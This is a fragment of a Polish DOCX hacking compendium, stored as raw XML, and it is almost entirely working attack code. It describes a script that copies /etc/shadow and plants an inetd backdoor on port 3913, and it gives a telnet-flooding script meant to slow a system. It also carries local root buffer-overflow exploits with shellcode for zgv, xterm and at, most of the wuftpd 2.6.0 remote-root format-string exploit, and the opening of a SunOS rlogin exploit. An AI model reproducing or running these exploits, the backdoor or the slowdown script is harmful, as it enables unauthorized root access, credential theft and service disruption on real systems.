        <w:t>/home/jerry/,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> następnie przegrywa plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">nadając mu atrybut odczytu, zapisu i wykonania. Po przekopiowaniu pliku wpisuje linijkę do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/inetd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> z ustawionym portem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>3913</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> na backdoora i na końcu restartuje demona i wypisuje informacje o błędz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Spowalnianie systemy &lt;&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zięki temu programikowi możemy przyczynić się do znacznego spowolnienia i zajęcia pamięci pracy linuxa. Powoduje on zalew sesji na czas 25 sekund i przez pewien czas jestesmy w stanie spowolnic syste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lt;jerry@sunnet jerry&gt;# ./zwolnij.s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at &lt;&lt;spox&gt; .dad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sleep 3; echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;sleep 4; echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>haslo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;sleep 25 ;)|telnet localhost</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>^---- twój login</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    ^---- twoje hasł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po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at &lt;&lt;dex&gt; .cou.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in(int argc, char *arg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int plu;</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plu=1; plu&lt;atoi(argv[1]); plu++) system("./.dada &amp;");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mod +x .dad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gcc -w -o run_ .cou.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un_ 18</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m -f run_ .dada .cou.c</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t;&gt; Exploity dla Linuxa - różne &lt;&l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Ten program trzeba skompilowac do pliku o jednoliterowej nazwie, </w:t>
        <w:tab/>
        <w:t xml:space="preserve">np. z i odpalic. Przy odrobinie farta dostaniemy roota, poniewaz </w:t>
        <w:tab/>
        <w:t xml:space="preserve">zgv wyklada sie na zmiennej srodowiskowej $HOME ktora podsuwa mu </w:t>
        <w:tab/>
        <w:t>ten progra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shellcod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31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe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ff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x0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89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"</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xcd\x8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in/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get_sp()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asm("movl %esp,%ea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bufsize 409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buffer[bufsiz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in()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i = 0; i &lt; bufsize - 4; i += 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amp;buffer[i] = get_sp() -467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set(buffer, 0x90, 51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cpy(&amp;buffer[512], shellcode, strlen(shellcod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uffer[bufsize - 1]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etenv("HOME", buffer,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ecl("/usr/bin/zgv", "/usr/bin/zgv", NULL);</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fcntl.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CXTERM_PATH "/usr/X11R6/bin/xter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BUFFER_SIZE 102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DEFAULT_OFFSET 5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NOP_SIZE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nop[] = "\x9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shellcod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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb\x0b"</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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x4\xc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80\xe8\xdc\xff\xff\xff/bin/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nsigned long get_sp(void)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__asm__("movl %esp,%ea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 main(int argc,char **arg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buff =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nsigned long *addr_ptr =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ptr =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i,OffSet = DEFAULT_OFFS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argc&gt;1) OffSet = atoi(argv[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uff = malloc(2048);</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bu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Buy more RAM!\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i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tr = bu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for (i = 0; i &lt;= BUFFER_SIZE - strlen(shellcode) - </w:t>
        <w:tab/>
        <w:t>NOP_SIZE;i+=NOP_SIZ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emcpy (ptr,nop,NOP_SIZ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tr+=NOP_SIZ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i=0;i &lt; strlen(shellcode);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tr++) = shellcode[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ddr_ptr = (long *)pt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i=0;i &lt; (8/4);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ddr_ptr++) = get_sp() + OffS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tr = (char *)addr_pt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tr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 fprintf(stderr, "This bug is discovered by Ming Zhan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zhang@softcom.net)\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ecl(CXTERM_PATH, "xterm", "-xrm",buff,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NLSPATH env. variable exploit: LINUX 1.2 - 1.3.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t's really annoying for users and good for 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T exploit gives only uid=0 and euid=your_usual_eui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fcntl.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stat.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path "/usr/bin/a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BUFFER_SIZE 102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DEFAULT_OFFSET 5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_long get_es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__asm__("movl %esp, %ea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in(int argc, char **arg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_char execshell[]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eb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x5\x0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b8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd\xc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80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/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buff =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nsigned long *addr_ptr =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ptr =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ofs = DEFAULT_OFFS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uff = malloc(409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bu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can't allocate memory\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tr = bu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emset(ptr, 0x90, BUFFER_SIZE-strlen(exec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tr += BUFFER_SIZE-strlen(exec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i=0;i &lt; strlen(execshell);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tr++) = execshell[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ddr_ptr = (long *)pt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i=0;i &lt; (8/4);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ddr_ptr++) = get_esp() + of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tr = (char *)addr_pt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tr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alarm((u_in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AT exploit discovered by me, _PHANTOM_ in 1997.\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env("NLSPATH",buff,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ecl(path, "at",NULL);</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 xml:space="preserve"> }</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 wuftpd2600.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VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999</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WUFTPD 2.6.0 REMOTE ROOT EXPLOI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by tf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NOTE*:  For ethical reasons, only an exploit for 2.6.0 will b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released (2.6.0 is the most popular version nowadays), and i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should suffice to proof this vulnerability concep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Site exec was never really *fixe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Greetz to portal (he is elite!#%$) and all #!security.is,</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glitch, DiGi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x90, venglin, xz, MYT and lamagra.</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Also greetings go to the WU-FTPD development team fo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including this bug in ALL their versions.</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Fuck to wuuru (he is an idio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Account is not required, anonymous access is enough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BTW, exploit is broken to avoid kids usag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VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999</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stdio.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string.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stdlib.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sys/types.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sys/socket.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sys/time.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netdb.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unistd.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netinet/in.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arpa/inet.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signal.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errno.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fdef __linux</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getopt.h&g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endi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efine MAKE_STR_FROM_RET(x) ((x)&amp;0xff),(((x)&amp;0xff00)&gt;&gt;8),(((x)&amp;0xff0000)&gt;&gt;16),(((x)&amp;0xff000000)&gt;&gt;24)</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efine GREEN "\033[32m"</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efine RED "\033[31m"</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efine NORM "\033[0m"</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char infin_loop[]= /* for testing purposes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EB\xF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char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin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31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"</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43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc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8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb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88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x8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31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"</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31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"</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f1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xc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80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"</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07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"</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0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"</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53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x3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62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6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67\x6c\x69\x6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char bsd_code_d[]= /* you should call it directly (no jump/ca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EB\xFE\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5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8B\x74\x24\xFC\x31\xC9\xB1\x15\x01\xCE\xB1\x71\xB0\xE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30\x06\x8D\x76\x01\xE2\xF9\xDE\x26\xDE\x2F\xBE\x5F\xF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BF\x22\x6F\x5F\xB5\xEB\xB4\xBE\xBF\x22\x6F\x62\xB9\x14"</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87\x75\xED\xEF\xEF\xBD\x5F\x67\xBF\x22\x6F\x62\xB9\x1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BE\xBD\x5F\xEA\xBF\x22\x6F\x66\x2C\x62\xB9\x14\xBD\x5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D2\xBF\x22\x6F\xBC\x5F\xE2\xBF\x22\x6F\x5C\x11\x62\xB9"</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12\x5F\xE3\xBD\xBF\x22\x6F\x11\x24\x9A\x1C\x62\xB9\x1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BD\x5F\xD2\xBF\x22\x6F\x62\x99\x12\x66\xA1\xEB\x62\xB9"</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17\x66\xF9\xB9\xB9\xBD\x5F\xD4\xBF\x22\x6F\xC0\x8D\x86"</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81\xC0\x9C\x87\xEF\xC1\xC1\xE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char linuxcode[]= /* Lam3rZ chroot() cod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31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"</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43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x3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c9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"</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cd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x3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db\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8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5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"</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09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc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88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc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31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xf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30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x3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efine MAX_FAILED      4</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efine MAX_MAGIC       10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static int magic[MAX_MAGIC],magic_d[MAX_MAGI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static char *magic_str=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before_len=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char *target=NULL,*username="ftp",*password=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struct targets geti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struct targets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de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os_descr, *shellcod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delay;</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_long pass_addr, addr_ret_add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magic[MAX_MAGIC], magic_d[MAX_MAGIC],islinux;</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struct targets tar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0,"RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},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0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},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0,"SuSe 6.3 with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},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0,"SuSe 6.4 with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},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0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},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0,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports",bsdcode,10,0x80bb474-100, 0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1,2,1,2,1,4},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1,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages",bsdcode,2,0x806d5b0-500,0xbfbfc6bc, {0x84,1,2,1,2}, {1,3,2,1,4},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0,"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports",bsdcode,2,0x80a4dec-400,0xbfbfc624, {0x3B,2,1,0xe,0x40,1,2,1,2},{1,2,1,2,1,3,2,1,4},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0,"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},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0,NULL,NULL,0,0,0,{0},{0},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void usage(char*zu,int q){</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i, n, paddin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fprintf(stderr,"Usage: %s -t &lt;target&gt; [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]\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m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]\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target    : host with any wuftpd\nuser      : anonymous user\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ir       : if not anonymous user, you need to have writable directory\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magic_str : magic string (see exploit description)\n-g        : enables magic string digging\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x        : enables test mode\npass_addr : pointer to setproctitle argument\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ret_addr  : this is pointer to shellcode\nsystypes: \n",zu);</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or(i=0;targ[i].os_descr!=NULL;i++){</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adding=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s%2d - %s\n",targ[i].def?"*":" ",i,targ[i].os_desc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q&g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     Magic ID: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or(n=0;targ[i].magic[n]!=0;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targ[i].magic_d[n]==4)</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adding=targ[i].magic[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02X,%02X",targ[i].magic[n],targ[i].magic_d[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targ[i].magic[n+1]!=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 Padding: %d\n",paddin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flush(stder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connect_to_server(char*hos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truct hostent *h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truct sockaddr_in c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nt sock;</w:t>
        <w:tab/>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host==NULL||*host==(char)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Invalid hostname\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cl.sin_addr.s_addr=inet_addr(host))==-1)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hp=gethostbyname(host))==NULL)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Cannot resolve %s\n",hos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emcpy((char*)&amp;cl.sin_addr,(char*)hp-&gt;h_addr,sizeof(cl.sin_add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sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-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Error creating socket: %s\n",strerror(errno));</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l.sin_family=PF_INE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l.sin_port=htons(2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connect(sock,(struct sockaddr*)&amp;cl,sizeof(cl))==-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Cannot connect to %s: %s\n",host,strerror(errno));</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soc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ftp_recv(int sock,char*buf,int buf_size,int dis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nt n=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har q;</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disc) while((n=recv(sock,&amp;q,1,0))==1&amp;&amp;q!='\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ls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void)bzero(buf,buf_siz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n=recv(sock,buf,buf_size,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n&lt;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ftp_recv: recv failed\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uf[n]=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ftp_send(int sock,char*what,int size,int f,char*ans,int ans_siz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nt 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n=send(sock,what,size,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n!=siz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ftp_send: failed to send. expected %d, sent %d\n", size,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hutdown(sock,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lose(soc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ftp_recv(sock,ans,ans_size,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ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_le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send(sock,buff,buff_len,q,ans,ans_le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strncmp(ans,"200-",4)==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recv(sock,NULL,0,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ls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recv(sock,ans,ans_len,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strncmp(ans,"200-",4)){</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Cannot find site exec response string\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void ftp_login(int sock,char*u_name,char*u_pass)</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har buff[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loggin into system..\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nprintf(buff,2047,"USER %s\r\n", u_nam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send(sock, buff,strlen(buff),1,buff,2047);</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GREEN"USER %s\n"NORM"%s",u_name,buf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nprintf(buff,2047,"PASS %s\r\n",u_pass);</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GREEN"PASS %s\n"NORM,*u_pass=='\x90'?"&lt;shellcode&gt;":u_pass);</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send(sock,buff,strlen(buff),1,buff,2047);</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hile(strstr(buff,"230 ")==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void)bzero(buff,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recv(sock,buff,2048,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s",buf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void ftp_mkchdir(int sock,char*cd,char*new)</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har buff[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printf(buff,"CWD %s\r\n",c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GREEN"%s"NORM,buf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send(sock,buff,strlen(buff),1,buff,2047);</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s",buf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printf(buff,"MKD %s\r\n",new);</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send(sock,buff,strlen(buff),1,buff,2047);</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GREEN"MKD &lt;shellcode&gt;"NORM"\n%s",buf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printf(buff,"CWD %s\r\n",new);</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send(sock,buff,strlen(buff),1,buff,2047);</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GREEN"CWD &lt;shellcode&gt;"NORM"\n%s",buf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void process_possibly_rooted(int soc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xml:space="preserve">fd_set </w:t>
        <w:tab/>
        <w:t>fd_rea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har buff[1024], *cmd=getit.islinux?"/bin/uname -a;/usr/bin/id;exit\n":"/usr/bin/uname -a;/usr/bin/id;exit\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nt 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D_ZERO(&amp;fd_rea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D_SET(sock, &amp;fd_rea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D_SET(0, &amp;fd_rea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end(sock, cmd, strlen(cmd), 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hile(1)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D_SET(sock,&amp;fd_rea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D_SET(0,&amp;fd_rea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select(sock+1,&amp;fd_read,NULL,NULL,NULL)&lt;0)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FD_ISSET(sock, &amp;fd_read) )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n=recv(sock,buff,sizeof(buff),0))&lt;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 "EOF\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write(1,buff,n)&lt;0)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 FD_ISSET(0, &amp;fd_read) )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n=read(0,buff,sizeof(buff)))&lt;0){</w:t>
        <w:tab/>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EOF\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send(sock,buff,n,0)&lt;0)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usleep(10);</w:t>
        <w:tab/>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Connection aborted, select failed()\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magic_check_f(int sock, char *str)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har q[2048], ans[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nprintf(q, 2048, "site exec %s%s\r\n", str, "%.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strstr( q, "\r\n") == NULL)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Line TOO big..\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siteexec(sock, q, strlen(q), 1, ans, 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before_len+10 &lt; strlen(&amp;ans[3]) ) return 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efore_len=strlen(&amp;ans[3]);</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void)strcat(str,"%.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magic_check_o(int sock, char *str)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har q[2048], ans[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nprintf(q, 2048, "site exec %s%s\r\n", str, "%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strstr( q, "\r\n") == NULL)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Line TOO big..\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siteexec( sock, q, strlen(q), 1, ans, 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before_len== strlen(&amp;ans[3]) )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efore_len+=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void)strcat(str, "%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3;</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efore_len=strlen(&amp;ans[3]);</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void)strcat(str,"%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magic_check_ok( int sock, char *st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har q[2048], ans[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nt i ,n=1, f, padding=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nprintf(q, 2048,"site exec aaaaaaaa%s%s\r\n", str, "%p%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 strstr(q, "\r\n" ) == NULL)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 "Line too long\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void)bzero(ans, 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siteexec(sock, q, strlen(q), 1, ans, 2047);</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strstr(ans,"0x61616161")==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or(i =0; i &lt; MAX_MAGIC &amp;&amp; magic[i]; i++);</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_d[i]=4;</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hile(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or(f=0; f&lt; 2; f++)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nprintf(q, 2048,"site exec %.*saaaa%s%s\r\n", padding, "xxxx", str, f?"%p%p":"%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void)bzero(ans, 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siteexec(sock, q, strlen(q), 1, ans, 2047);</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strstr(ans, "0x61616161")!=NULL)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f==0)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i]=paddin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else if( f==1)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trcat(str,"%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i]=paddin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padding &gt; 4)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Cannot calculate padding..\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adding++;</w:t>
        <w:tab/>
        <w:tab/>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magic_digger(int soc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nt get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=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magic_str==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magic_str=(char*)malloc(4092))==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error("mallo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errno);</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void)bzero(magic_str, 409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here=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hile(get_out)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nt q;</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where &gt;= MAX_MAGIC-1 || all_failed &lt;= 0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magic_check_f(sock, magic_str) )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o=0,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f==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magic[wher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where]=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ls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where]+=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_d[where]=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els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where]+=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ll_failed=MAX_FAILED*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s", "%.f"); fflush(stdou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goto verify;</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ll_faile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q=magic_check_o(sock,magic_st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0,o++;</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o==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magic[wher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0]=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ls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where]+=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_d[where]=q;</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els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magic_d[where]==q)</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where]+=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ls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where]=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agic_d[where]=q;</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ll_failed=MAX_FAILED*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s", q==2?"%c":"%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flush(stdou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goto verify;</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ll_faile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ontinu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verify:</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magic_check_ok(sock,magic_st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utchar('\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main(int argc, char *argv[]){</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buff, *buff_p, *buff_p2, c, shellcode[500],*dir,*passwd=shellcod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i, sock, num=-2, padding=-1, gm=0, testmode=0,mtype=0,bla=0,offset=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_long ret_addr=0, pass_addr=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i=0;targ[i].os_descr!=NULL;i++);</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hile((c=getopt(argc,argv,"t:l:m:o:s:r:p:M:P:xghH?"))!=EO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witch(c)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t': target=optarg;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sername=optar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asswd=strchr(optar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passwd==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sage(argv[0],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asswd++=(char)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x': testmode=1;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o': offset=atoi(optarg);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p': pass_addr=strtoul(optarg, &amp;optarg,16);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g': gm=1;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M': dir=optarg;mtype=1;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m':</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where=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optarg)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stderr,"-m requires argument, try -h for help\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hile(1)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agic[where]=strtoul(optarg,&amp;optarg,16);</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optarg=strchr(optar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optarg==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comma missing\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b/>
        <w:t>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optar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agic_d[where++]=strtoul(optarg,&amp;optarg,16);</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strchr(optarg,':')==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agic[where]=magic_d[where]=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optarg=strchr(optar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optar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s':/*</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num=atoi(optar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num&gt;i)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stderr,"systype too big, try -h for help\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ret_addr=strtoul(optarg,&amp;optarg,16);</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adding=atoi(optarg);</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H':</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la=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efault: usage(argv[0],bla);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target==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stderr,"No target specified, try -h for help\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num==-1||num==-2)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i=0;!targ[i].def;i++);</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num=i;</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memcpy((void*)&amp;getit,(void*)&amp;targ[num],sizeof(struct targets));</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magic[1]!=0)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cpy((void*)getit.magic,magic,sizeof(magi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cpy((void*)getit.magic_d,magic_d,sizeof(magi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ret_addr)getit.addr_ret_addr=ret_add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pass_addr)getit.pass_addr=pass_add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getit.addr_ret_addr+=(offset*4);</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sock=connect_to_server(targe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emset(shellcode, '\x90', sizeof(shellcod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hellcode[sizeof(shellcode)-1]=(char)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mtyp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cpy((void*)&amp;shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void*)getit.shellcode, strlen(getit.shellcode)+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hellcode[sizeof(shellcode)-1]=(char)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ls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cpy((void*)&amp;shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellcode,strlen(getit.shellcod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hellcode[250-1]=(char)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Target: %s (%s/%s): %s\n",target,username,*passwd=='\x90'?"&lt;shellcode&gt;":passwd,getit.os_desc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Return Address: 0x%08lx, AddrRetAddr: 0x%08lx, Shellcode: %d\n\n",getit.pass_addr,getit.addr_ret_addr,strlen(getit.shellcod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uff=(char *)malloc(1024);</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zero(buff,1024);</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ftp_recv(sock,NULL,0,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ftp_login(sock,username,passw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gm||(magic_str==NULL&amp;&amp;getit.magic[0]==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STEP 2A: Generating magic string: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flush(stdou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agic_digger(soc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cpy((void *)getit.magic,(void*)magic,sizeof(magi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cpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_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STEP 2B: MAGIC STRING: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els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STEP 2 : Skipping, magic number already exists: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i=0;i&lt;MAX_MAGIC&amp;&amp;getit.magic[i]!=0;i++){</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02X,%02X",getit.magic[i],getit.magic_d[i]);</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getit.magic[i+1]!=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utcha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uff=(char *)realloc(buff, 409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bzero(buff, 409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mtyp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tp_mkchdir(sock,dir,shellcod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STEP 3 : Checking if we can reach our return address by format string\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magic_st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agic_str=(char*)malloc(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magic_str==NULL)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error("mallo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errno);</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void)bzero(magic_str,2048);</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i=0;i&lt;MAX_MAGIC&amp;&amp;getit.magic[i]!=0;i++){</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witch(getit.magic_d[i])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num=0;num&lt;getit.magic[i];num++)strcat(magic_str,"%.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num=0;num&lt;getit.magic[i];num++)strcat(magic_str,"%c");</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3:</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num=0;num&lt;getit.magic[i];num++)strcat(magic_str,"%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ase 4:if(padding&lt;0)padding=getit.magic[i];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efault:fprintf(stderr,"STEP 3: INternal error\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 xml:space="preserv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padding&lt;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num=0;num&lt;MAX_MAGIC&amp;&amp;getit.magic_d[num]!=4;num++);</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num&lt;(MAX_MAGIC-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adding=getit.magic[num];</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ls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stderr,"WARNING: PROBLEMS WITH PADDING\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getit.islinux){</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 xml:space="preserve"> if(!testmod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nprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%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ls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nprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%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els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 xml:space="preserve"> if(!testmod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nprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%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ls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nprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%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leep(getit.delay);</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flush(stdou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buff_p=(char *)malloc(4096))==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stderr,"malloc failed.\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bzero(buff_p,4096);</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tp_siteexec(sock,buff,strlen(buff),1,buff_p,4095);</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buff_p2=strchr(buff_p,'\r'))!=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uff_p2=(char)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buff_p2=strchr(buff_p,'\n'))!=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uff_p2=(char)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uff_p2=strstr(buff_p,"|0x");</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buff_p2==NULL){</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stderr,"Fix me, incorrect response from '%%p':%s\n",buff_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1);</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uff_p2+=3;</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testmod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STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.addr_ret_add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ls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STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.pass_addr);</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leep(getit.delay);</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uff_p2=strstr(buff, "%.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uff_p2++=(char )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trcpy(buff_p, buf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testmod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printf(buff_p+strlen(buff_p),"%s%u%c","%d%.",(u_int)getit.pass_addr,'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ls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printf(buff_p+strlen(buff_p),"%s","%d%d");</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trcpy(buff_p+strlen(buff_p), buff_p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uff_p2=strchr(buff_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uff_p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STEP 5 : Sending code.. this will take about 10 seconds.\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testmode){</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trcpy(buff_p2,"%n\r\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tp_send(sock,buff_p,strlen(buff_p),0,NULL,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else {</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void)bzero(buff,4096);</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trcpy(buff_p2,"%s\r\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tp_send(sock,buff_p,strlen(buff_p),1,buff,4092);</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got answer: %s\n",buf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0);</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ree(buff_p);</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ree(buff);</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ignal(SIGINT, SIG_IG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ignal(SIGHUP, SIG_IG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RED"Press ^\\ to leave shell"NORM"\n");</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ocess_possibly_rooted(sock);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="710" w:hanging="0"/>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eturn 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="710" w:hanging="0"/>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t;&gt; Exploit dla SunOS &lt;&l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SUNOS Rlogin exploit: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types.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BUF_LENGTH      82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EXTRA           1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STACK_OFFSET    4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SPARC_NOP       0xa61cc013</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_char sparc_shellcod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82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0</w:t>
        <w:tab/>
        <w:t>\x13"</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a6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1</w:t>
        <w:tab/>
        <w:t>\x6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2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80</w:t>
        <w:tab/>
        <w:t>x0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9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf</w:t>
        <w:tab/>
